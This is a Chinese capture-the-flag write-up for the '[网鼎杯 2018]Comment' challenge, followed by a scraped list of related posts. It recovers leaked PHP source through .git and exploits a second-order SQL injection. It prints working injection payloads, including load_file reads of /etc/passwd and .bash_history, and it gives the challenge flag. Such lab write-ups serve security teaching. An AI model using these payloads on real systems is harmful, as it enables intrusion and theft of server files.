1、打开之后只有一个留言页面,很自然的就想到了二次注入得问题,顺带查看了下源代码信息,并没有什么提示,显示界面如下:

2、那先扫描一下目录,同时随便留言一个测试以下,但是显示需要登录,账户、密码给出了部分提示,但是最后三位密码需要爆破,结果如下:

3、扫描到了.git文件,那就使用githack尝试获取下源码信息,但是显示得源码信息不全,需要恢复,(这里在网上找了下,一直恢复不成功,后面再看),结果如下:

githack下载下来的:

<?php

include "mysql.php";

session_start();

if($_SESSION['login'] != 'yes'){

    header("Location: ./login.php");

    die();

}

if(isset($_GET['do'])){

switch ($_GET['do'])

{

case 'write':

    break;

case 'comment':

    break;

default:

    header("Location: ./index.php");

}

}

else{

    header("Location: ./index.php");

}

?>

完整得源码:

<?php

include "mysql.php";

session_start();

if($_SESSION['login'] != 'yes'){

    header("Location: ./login.php");

    die();

}

if(isset($_GET['do'])){

switch ($_GET['do'])

{

case 'write':

    $category = addslashes($_POST['category']);

    $title = addslashes($_POST['title']);

    $content = addslashes($_POST['content']);

    $sql = "insert into board

            set category = '$category',

                title = '$title',

                content = '$content'";

    $result = mysql_query($sql);

    header("Location: ./index.php");

    break;

case 'comment':

    $bo_id = addslashes($_POST['bo_id']);

    $sql = "select category from board where id='$bo_id'";

    $result = mysql_query($sql);

    $num = mysql_num_rows($result);

    if($num>0){

    $category = mysql_fetch_array($result)['category'];

    $content = addslashes($_POST['content']);

    $sql = "insert into comment

            set category = '$category',

                content = '$content',

                bo_id = '$bo_id'";

    $result = mysql_query($sql);

    }

    header("Location: ./comment.php?id=$bo_id");

    break;

default:

    header("Location: ./index.php");

}

}

else{

    header("Location: ./index.php");

}

?>

4、先随便进行一个发帖,然后提交留言,回显了我们的留言信息,那也就确定了二次注入的回显数据的地方,结果如下:

5、对获得的源代码进行分析,服务端在接受到我们的数据之后进行了转义处理(addslashes),但是数据在存到数据库中时还是存储的我们提交的数据,变化过程:'->\'->',结合代码:

$sql = "insert into board

            set category = '$category',  //category参数可控

                title = '$title',

                content = '$content'";   

$sql = "select category from board where id='$bo_id'";   //直接取用我们可以控制的category参数

$sql = "insert into comment

            set category = '$category',

                content = '$content',

                bo_id = '$bo_id'";

//content参数可控并且会展示其内容,调用了我们可控的category参数,所以这条sql语句中就有两个地方我们可以直接控制

我们留言的内容在(content):

所以我们就需要把我们想看到的信息写入到content中,使其进行展示,加入我们想要获取database()的信息,那我们就应该形成:

$sql = "insert into comment

            set category = '$category',

                content = database(),

                bo_id = '$bo_id'";

这里很明显content参数的单引号去掉了,但是content参数有进行转义,所以导致这一情况的只能是category参数,这里想到了之前做过的一道题:https://www.cnblogs.com/upfine/p/16545379.html,通过转义符使&passwd=成为了搜索的用户名内容(见下图),那这里我们也可以采用这种方式,因此构造我们的category的payload:\,我们的content的payload:,content=database(),#。结果如下:

6、在网上看到了另外一种方式,就是采用/**/来注释掉原来的content内容,其实两种方式原理差不多,一个是采用/**/注释掉content部分的内容,一个是采用\转移单引号,使content内容成为了category的写入内容(这里写入的是comment表,所以并不会影响原来从board获取的category值,写入之后语句中的category还是\,可以看上面图,在一个发帖中同时获取了user和database),网上category的payload:',content=database(),/*,content的payload:*/#。结果如下:

7、然后就进获取表、列,具体的信息等,但是并没有获取flag,那就应该是存放在系统上的一个文件里了,读取下/etc/passwd,这里不要使用\转义,因为payload中存在单引号,使用这种方式时,导致payload语句中的单引号被转移,而无法执行;

所以这里我们就只能使用/**/注释掉content内容的方式了,category的payload:',content=(select(load_file('/etc/passwd'))),/*,content的payload:*/#,读取的/etc/passwd信息如下:

8、www用户的目录是/home/www,读取一下.bash_history文件,查看下用户使用的命令,category的payload:',content=(select(load_file('/home/www/.bash_history'))),/*,content的payload:*/#,发现了.DS_Store文件,结果如下:

.bash_history文件:

9、那就读取下.DS_Store文件,category的payload:',content=(select(load_file('/home/www/.bash_history'))),/*,content的payload:*/#,结果如下(应该是没有读完):

10、那就使用hex编码读取一下,category的payload:',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*,content的payload:*/#,结果如下:

返回内容如下:

00000001427564310000100000000800000010000000040A000000000000000000000000000000000000000000000800000008000000000000000000000000000000000000000002000000000000000B000000010000100000730074007200610070496C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000B000000090062006F006F007400730074007200610070496C6F63626C6F62000000100000004600000028FFFFFFFFFFFF00000000000B0063006F006D006D0065006E0074002E007000680070496C6F63626C6F6200000010000000CC0000002800000001FFFF000000000003006300730073496C6F63626C6F62000000100000015200000028FFFFFFFFFFFF0000000000190066006C00610067005F0038003900340036006500310066006600310065006500330065003400300066002E007000680070496C6F63626C6F6200000010000001D800000028FFFFFFFFFFFF0000000000050066006F006E00740073496C6F63626C6F62000000100000004600000098FFFFFFFFFFFF0000000000090069006E006400650078002E007000680070496C6F63626C6F6200000010000000CC0000009800000002FFFF000000000002006A0073496C6F63626C6F62000000100000015200000098FFFFFFFFFFFF000000000009006C006F00670069006E002E007000680070496C6F63626C6F6200000010000001D800000098FFFFFFFFFFFF000000000009006D007900730071006C002E007000680070496C6F63626C6F62000000100000004600000108FFFFFFFFFFFF00000000000600760065006E0064006F0072496C6F63626C6F6200000010000000CC00000108FFFFFFFFFFFF00000000000C00770072006900740065005F0064006F002E007000680070496C6F63626C6F62000000100000015200000108FFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000080B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000002000000001000000400000000100000080000000010000010000000001000002000000000100000400000000000000000100001000000000010000200000000001000040000000000100008000000000010001000000000001000200000000000100040000000000010008000000000001001000000000000100200000000000010040000000000001008000000000000101000000000000010200000000000001040000000000000108000000000000011000000000000001200000000000000140000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000000000000100B000000450000040A000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000104445344420000000100000000000000000000000000000000000000000000000200000020000000600000000000000001000000800000000100000100000000010000020000000000000000020000080000001800000000000000000100002000000000010000400000000001000080000000000100010000000000010002000000000001000400000000000100080000000000010010000000000001002000000000000100400000000000010080000000000001010000000000000102000000000000010400000000000001080000000000000110000000000000012000000000000001400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

进行16进制转换(https://www.toolscat.com/decode/hex),结果如下:

最终成功得到flag文件:flag_8946e1ff1ee3e40f.php。

11、读取下flag文件,category的payload:',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*,content的payload:*/#,结果如下:

返回信息如下:

3C3F7068700A0924666C61673D22666C61677B64363335303431392D326336372D343261392D386664352D3538663932653334363631647D223B0A3F3E0A

进行16进制转码,最终成功得到flag:flag{d6350419-2c67-42a9-8fd5-58f92e34661d},结果如下:

[网鼎杯 2018]Comment-1|SQL注入|二次注入的更多相关文章

  1. [网鼎杯 2018]Comment

    [网鼎杯 2018]Comment 又遇到了一道有意思的题目,还是比较综合的,考的跟之前有一道很相像,用的还是二次注入. 因为找不到登陆点的sql注入,所以扫了一下源码,发现是存在git泄露的. [2 ...

  2. [网鼎杯2018]Unfinish-1|SQL注入|二次注入

    1.进入题目之后只有一个登录界面,检查源代码信息并没有发现有用的信息,尝试万能密码登录也不行,结果如下: 2.进行目录扫描,发现了注册界面:register.php,结果如下: 3.那就访问注册界面, ...

  3. [原题复现+审计][网鼎杯 2018] WEB Fakebook(SSRF、反序列化、SQL注入)

    简介  原题复现:  考察知识点:SSRF.反序列化.SQL注入  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 过 ...

  4. 【网鼎杯2018】fakebook

    解题过程: 首先进行目录扫描,发现以下目录: user.php.bak login.php flag.php user.php robots.txt user.php.bak猜测存在源码泄露. 查看源 ...

  5. 刷题 [网鼎杯 2018]Fakebook

    解题思路 首先登陆页面发现是这样的: 查看源码 源码很正常,也没有什么特别的 web目录扫描 我用的是dirmap工具扫描,扫描结果保存在一个txt文件中,结果可知没什么后台. robots.txt ...

  6. 刷题记录:[网鼎杯]Fakebook

    目录 刷题记录:[网鼎杯]Fakebook 一.涉及知识点 1.敏感文件泄露 2.sql注入 二.解题方法 刷题记录:[网鼎杯]Fakebook 题目复现链接:https://buuoj.cn/cha ...

  7. CTF-i春秋网鼎杯第四场部分writeup

    CTF-i春秋网鼎杯第四场部分writeup 因为我们组的比赛是在第四场,所以前两次都是群里扔过来几道题然后做,也不知道什么原因第三场的题目没人发,所以就没做,昨天打了第四场,简直是被虐着打. she ...

  8. CTF-i春秋网鼎杯第二场misc部分writeup

    CTF-i春秋网鼎杯第二场misc部分writeup 套娃 下载下来是六张图片 直接看并没有什么信息 一个一个查看属性 没有找到有用信息 到winhexv里看一下 都是标准的png图片,而且没有fla ...

  9. CTF-i春秋网鼎杯第一场misc部分writeup

    CTF-i春秋网鼎杯第一场misc部分writeup 最近因为工作原因报名了网鼎杯,被虐了几天后方知自己还是太年轻!分享一下自己的解题经验吧 minified 题目: 一张花屏,png的图片,老方法, ...

随机推荐

  1. Python装饰器Decorators

    def hi(name="yasoob"): return "hi " + name print(hi()) # 我们甚至可以将一个函数赋值给一个变量,比如 g ...

  2. JavaScript中的??和?.和??=操作符

    JS中两种不常使用但挺实用的操作符:??和?. 一起来了解并学会使用它们吧: 空值合并操作符:?? 只有当操作符左侧为null或undefined时才会返回操作符右侧的值,否则返回左侧的值. eg: ...

  3. C# 将HTML转为XML

    本文以C#及VB.NET后端程序代码示例展示如何将HTML转为XML文件.转换时,调用Word API -Free Spire.Doc for .NET 提供的文档加载方法及文档保存的方法来实现.转换 ...

  4. 写个js获取2019博客之星投票活动的名次与投票数

    获取投票数 // app.jsvar request = require('request');var cheerio = require('cheerio');request('http://m23 ...

  5. MongoDB 的安装和基本操作

    MongoDB 的安装 使用 docker 安装 下载镜像: docker pull mongo:4.4.8(推荐,下载指定版本) docker pull mongo:latest (默认下载最新版本 ...

  6. CF1656E Equal Tree Sums 题解

    题目链接 思路分析 自认为是一道很好的构造题,但是我并不会做. 看了题解后有一些理解,在这里再梳理一遍巧妙的思路. 我们先来看这样的一张图: 我们发现当去掉叶子节点的父亲时,剩下树的价值和等于叶子节点 ...

  7. DBSync新增对MongoDB、ES的支持

    数据库同步工具DBSync近日进行了升级,最新版本为V1.9,新增了对MongoDB.Elasticseach(ES)的支持,具体情况:1.支持同型库之间的同步,如:MongoDB至MongoDB,E ...

  8. appium实现简单的功能测试

    实现思路 思路: 1.获取capabilities信息 2.启动app(包含安装过程) 3.检查是否安装成功 4.卸载app 5.检查是否卸载成功 6.执行×3 from time import sl ...

  9. 【cartogarpher_ros】二: 官方Demo的介绍与演示

    上一节我们介绍了在linux中快速安装集成ros环境的cartographer. 本节我们会来跑一些官方demo,用于测试cartographer是否正确安装,顺便看看cartographer的建图与 ...

  10. Markdown 的基本使用

    Markdown基本语法 1.标题 //标题的写法 #一级标题 ##二级标题 ###三级标题 //以此类推... 效果: 一级标题 二级标题 三级标题 2.分割线 使用三个或以上-或*表示,并且改行不 ...